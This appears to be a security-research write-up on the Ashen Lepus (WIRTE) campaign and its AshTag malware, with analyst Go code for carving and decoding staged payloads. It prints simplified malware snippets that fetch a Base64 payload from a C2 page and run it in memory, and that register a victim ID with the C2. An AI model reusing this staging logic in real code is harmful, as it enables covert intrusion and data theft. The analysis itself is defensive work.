
A Hamas‑affiliated threat group known as Ashen Lepus, also tracked as WIRTE, has launched a new espionage campaign against governmental and diplomatic entities across the Middle East.
The group uses realistic Arabic‑language diplomatic lures that reference regional politics and security talks to trick officials into opening weaponized documents.
Once a target interacts with the lure, a multi‑stage chain quietly delivers a new custom malware suite named AshTag, designed to steal sensitive diplomatic documents and maintain long‑term access to compromised systems.
The operation has continued through recent regional conflicts and even after the October 2025 Gaza ceasefire, underlining the group’s focus on persistent intelligence collection rather than short‑term disruption.
The attackers rely on benign‑looking PDFs that direct victims to download RAR archives containing a fake document executable, a malicious loader, and an extra decoy PDF.
When the victim runs what appears to be a document, the executable side‑loads the malicious loader DLL bundled beside it in the archive (classic DLL side‑loading) and the infection begins, while the harmless decoy PDF opens on screen to reduce suspicion.
Palo Alto Networks security researchers identified this new AshTag toolkit while tracking long‑running Ashen Lepus activity and noticed clear changes in both the malware and its command‑and‑control (C2) infrastructure.
Instead of using dedicated attacker‑owned domains, the group now hides behind API‑style subdomains of legitimate‑looking sites, such as api.healthylifefeed[.]com and auth.onlinefieldtech[.]com, to make their traffic blend in with normal web activity.
At the same time, payloads are executed in memory to leave fewer forensic traces on disk.
AshTag Infection Mechanism and Orchestrator Design
At the core of the campaign is a modular .NET backdoor, AshTag, which masquerades as a VisualServer utility but actually supports file exfiltration, command execution and in‑memory loading of extra tools.
The chain moves from an initial loader dubbed AshenLoader, to a secondary stager called AshenStager, and finally to an orchestration component, AshenOrchestrator, which controls all later modules.
AshenLoader sends basic host data to the C2 and fetches AshenStager from HTML content hidden between custom headerp tags.
AshenStager then requests another page and extracts a Base64‑encoded payload buried inside article tags.
A simplified version of this parsing logic can be expressed as:

```csharp
using System;
using System.Text.RegularExpressions;

// Fetch the staging page and pull the Base64 blob out of the <article> element
var html = GetHtml(c2Url);
var match = Regex.Match(html, @"<article[^>]*>(?<data>[^<]+)</article>");
var b64 = match.Groups["data"].Value;
var payload = Convert.FromBase64String(b64);   // decode to raw bytes
ExecuteInMemory(payload);                       // run without touching disk
```
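The same carving step, written here as an added analyst‑side example rather than code from the report or from the malware, generalised to either hiding element: given a captured response body and the tag name (headerp for the stager page, article for the module page), it returns every blob found in page order, decodes the ones that are valid Base64 and hashes them for pivoting. The response body is constructed for the example, not a real capture, and the "MZ-placeholder-module" text stands in for a .NET assembly.

```go
package main

import (
	"crypto/sha256"
	"encoding/base64"
	"encoding/hex"
	"fmt"
	"regexp"
	"strings"
)

// StagedPayload is one blob carved out of a C2 response body.
type StagedPayload struct {
	Tag    string // element the blob was hidden in (headerp, article, ...)
	Raw    string // text exactly as it sat between the tags
	Bytes  []byte // decoded bytes; nil when the text is not valid Base64
	SHA256 string // hex digest of Bytes for pivoting; empty when not decoded
}

// tagPattern matches <tag ...>inner</tag>. (?is) makes it case-insensitive and
// lets the blob span lines; (?:\s[^>]*)? tolerates attributes on the opening tag.
func tagPattern(tag string) *regexp.Regexp {
	t := regexp.QuoteMeta(tag)
	return regexp.MustCompile(`(?is)<` + t + `(?:\s[^>]*)?>(.*?)</` + t + `>`)
}

// CarvePayloads returns every blob hidden inside the named element, in page
// order. Whitespace is stripped before decoding; text that is not valid Base64
// is still reported (Bytes == nil) so the analyst sees what was there.
func CarvePayloads(body, tag string) []StagedPayload {
	var out []StagedPayload
	for _, m := range tagPattern(tag).FindAllStringSubmatch(body, -1) {
		p := StagedPayload{Tag: tag, Raw: strings.TrimSpace(m[1])}
		compact := strings.Join(strings.Fields(p.Raw), "")
		if b, err := base64.StdEncoding.DecodeString(compact); err == nil {
			sum := sha256.Sum256(b)
			p.Bytes, p.SHA256 = b, hex.EncodeToString(sum[:])
		}
		out = append(out, p)
	}
	return out
}

// sampleModulePage is a constructed response body, not a real capture. The
// first <article> holds Base64 of "MZ-placeholder-module" standing in for a
// .NET assembly; the second holds ordinary page text to show the no-decode path.
const sampleModulePage = `<html><body>
<h1>Healthy Life Feed</h1><p>Ten foods to eat this week</p>
<article class="post">
TVotcGxhY2Vo
b2xkZXItbW9kdWxl
</article>
<article class="post">Read more about seasonal produce!</article>
</body></html>`

func main() {
	for i, p := range CarvePayloads(sampleModulePage, "article") {
		if p.Bytes == nil {
			fmt.Printf("article #%d: not Base64 (%q)\n", i, p.Raw)
			continue
		}
		fmt.Printf("article #%d: %d bytes, sha256=%s\n", i, len(p.Bytes), p.SHA256)
	}
}
```

One caveat the second article illustrates: ordinary prose with no punctuation can itself be valid Base64, so a decoded blob should be confirmed by its content (an MZ header, a .NET metadata signature) rather than by the fact that decoding succeeded.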
AshenOrchestrator receives a Base64‑encoded JSON configuration that includes C2 domains, module URLs, encryption keys and jitter values mn and mx to randomize beacon timing.
It first derives an AES key from tg and au parameters, then decrypts an XOR key used to decode the next embedded payload.
That payload is another Base64‑encoded JSON object that names the module’s class, such as SN for system fingerprinting or SCT for screen capture, and its loading method mna, which tells the orchestrator whether to save the module to disk, execute it as a .NET assembly, upload extra content, or inject code into memory.
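As an added analyst‑side example, not the orchestrator’s code or code from the report, the layering above run backwards over a configuration the block constructs itself: outer Base64 to JSON, an AES key from tg and au, the XOR key unwrapped with it, the embedded payload XOR‑decoded and Base64‑decoded to the inner JSON, and mna checked against the four loading methods. The report does not say how the AES key is derived, which AES mode is used, or what the other JSON keys are called; SHA‑256 over tg||au, AES‑256‑CTR with a zero IV, seconds as the unit of mn and mx, and the field names c2, xk, pl and cls are all assumptions of this example.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"fmt"
)

// Outer JSON. tg, au, mn and mx are the names the report gives; c2, xk and pl are assumed.
type OrchestratorConfig struct {
	C2 []string `json:"c2"`
	Tg string   `json:"tg"`
	Au string   `json:"au"`
	Mn int      `json:"mn"` // beacon jitter window, seconds (unit assumed)
	Mx int      `json:"mx"`
	Xk string   `json:"xk"` // Base64 of the AES-encrypted XOR key
	Pl string   `json:"pl"` // Base64 of the XOR-encoded inner payload
}

type ModuleSpec struct { // inner JSON: class name (SN, SCT, ...) and load method mna
	Cls string `json:"cls"`
	Mna string `json:"mna"`
}

var validMna = map[string]bool{"disk": true, "assembly": true, "upload": true, "inject": true} // the four methods the report lists

// Assumed derivation: SHA-256 over tg||au (the report only says the key comes from tg and au).
func deriveKey(tg, au string) []byte {
	sum := sha256.Sum256([]byte(tg + au))
	return sum[:]
}

// AES-256-CTR, zero IV (mode and IV assumed); CTR is its own inverse, so this both wraps and unwraps.
func aesCTR(key, data []byte) []byte {
	block, _ := aes.NewCipher(key) // 32-byte key from SHA-256, cannot fail
	out := make([]byte, len(data))
	cipher.NewCTR(block, make([]byte, aes.BlockSize)).XORKeyStream(out, data)
	return out
}

func xorBytes(data, key []byte) []byte { // repeating-key XOR, encode and decode alike
	out := make([]byte, len(data))
	for i := range data {
		out[i] = data[i] ^ key[i%len(key)]
	}
	return out
}

// DecodeConfig peels the layers in the order the report gives.
func DecodeConfig(b64 string) (*OrchestratorConfig, *ModuleSpec, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return nil, nil, fmt.Errorf("outer base64: %w", err)
	}
	var cfg OrchestratorConfig
	if err := json.Unmarshal(raw, &cfg); err != nil {
		return nil, nil, fmt.Errorf("outer json: %w", err)
	}
	encKey, err1 := base64.StdEncoding.DecodeString(cfg.Xk)
	encPl, err2 := base64.StdEncoding.DecodeString(cfg.Pl)
	if err1 != nil || err2 != nil || len(encKey) == 0 || cfg.Mn < 0 || cfg.Mx < cfg.Mn {
		return nil, nil, fmt.Errorf("malformed xk, pl or mn/mx fields")
	}
	xorKey := aesCTR(deriveKey(cfg.Tg, cfg.Au), encKey)
	// With the wrong tg/au the unwrapped key is garbage and this decode fails.
	inner, err := base64.StdEncoding.DecodeString(string(xorBytes(encPl, xorKey)))
	if err != nil {
		return nil, nil, fmt.Errorf("inner base64 (wrong key?): %w", err)
	}
	var mod ModuleSpec
	if err := json.Unmarshal(inner, &mod); err != nil || !validMna[mod.Mna] {
		return nil, nil, fmt.Errorf("inner payload: %v, mna=%q", err, mod.Mna)
	}
	return &cfg, &mod, nil
}

// BuildSample constructs an example configuration (not a recovered one) by running the same layers forward.
func BuildSample() string {
	tg, au, xorKey := "tg-example", "au-example", []byte("k3y!")
	inner, _ := json.Marshal(ModuleSpec{Cls: "SN", Mna: "assembly"})
	innerB64 := []byte(base64.StdEncoding.EncodeToString(inner))
	cfg := OrchestratorConfig{
		C2: []string{"api.healthylifefeed[.]com", "auth.onlinefieldtech[.]com"},
		Tg: tg, Au: au, Mn: 30, Mx: 90,
		Xk: base64.StdEncoding.EncodeToString(aesCTR(deriveKey(tg, au), xorKey)),
		Pl: base64.StdEncoding.EncodeToString(xorBytes(innerB64, xorKey)),
	}
	outer, _ := json.Marshal(cfg)
	return base64.StdEncoding.EncodeToString(outer)
}

func main() {
	cfg, mod, err := DecodeConfig(BuildSample())
	if err != nil {
		panic(err)
	}
	fmt.Printf("c2=%v module=%s loaded via %q\n", cfg.C2, mod.Cls, mod.Mna)
}
```

The point of the layering, from the defender’s side, is that nothing in the outer JSON is useful on its own: the module name and loading method only appear after the tg/au‑derived key has unwrapped the XOR key, so a config extractor has to carry the whole chain rather than stop at the first Base64 blob.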
One recovered module, SN, performs host profiling through simple WMI queries and sends a unique victim ID back to the attackers, helping Ashen Lepus focus on high‑value diplomatic systems.
A basic version of this logic can be illustrated as:

```csharp
// Read the system product UUID via WMI and register it with the C2 as the victim ID
var id = GetWmi("Win32_ComputerSystemProduct", "UUID");
PostToC2("/api/v2/register", id);
```
This careful layering of loaders, HTML‑hidden payloads, and modular .NET components shows that Ashen Lepus is steadily improving its tradecraft while keeping the code base simple, flexible and tuned for stealthy diplomatic espionage.
